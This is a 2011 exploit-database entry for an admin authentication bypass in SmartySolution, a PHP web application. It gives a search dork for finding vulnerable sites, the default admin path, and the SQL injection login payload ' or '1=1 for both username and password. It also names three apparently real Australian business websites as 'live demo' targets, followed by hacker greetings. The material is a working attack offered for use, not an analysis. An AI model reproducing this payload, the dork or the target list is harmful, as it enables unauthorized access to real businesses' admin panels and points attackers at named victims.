SmartySolution Admin Auth ByPass

2011-06-06T00:00:00
ID 1337DAY-ID-16261
Type zdt
Reporter xConsoLe`
Modified 2011-06-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [-]

/\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\.
\. [+] Exploit Title : SmartySolution Admin Auth ByPass
\. [+] Date : 05 June 2011
\. [+] Author : xConsoLe` // Thanks to mohsan123
\. [+] Category : WebApps
\. [+] d0rk : "by www.SmartySolution.com.au"
\. [+] Home : http://dzt00ls.tk/ Or http://dztools.net/
\. [+] Tested on : Windows Xp SP3
/\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\.

  (  )   /\   _                 (
    \ |  (  \ ( \.(               )                      _____
  \  \ \  `  `   ) \             (  ___                 / _   \
 (_`    \+   . x  ( .\            \/   \____-----------/ (o)   \_
- .-               \+  ;          (  O                           \____
     Dz  4            	 )        \_____________  `              \  /
(__    Ever <3       +- .( -'.- <. - _  VVVVVVV VV V\                 \/
(_____            ._._: <_ - <- _  (--  _AAAAAAA__A_/                |
  .    /./.+-  . .- /  +--  - .     \______________//_              \_______
  (__ ' /x  / x _/ (                                  \___'          \     /
 , x / ( '  . / .  /                                      |           \   /
    /  /  _/ /    +                                      /              \/
   '  (__/                                             /                  \

   
[+] Default admin panel : http://localhost/admin

[+] ByPass the admin auth by using 

Username : ' or '1=1
Password : ' or '1=1

[+] Live Demo ;

[+] http://edhardy4sale.com.au/emuholiday_new/admin/
[+] http://www.emuholidayhire.com.au/admin/
[+] http://www.g4glass.com.au/admin/

[+] enD`

[G]reetz ; Ukn0wnv1rus , Dfpirate , J|nX , XeN` ( Le bac aproche ;D )

[+]Special Thanks to mohsan123 ;D .

[+] Peace * .

[-]



#  0day.today [2018-04-11]  #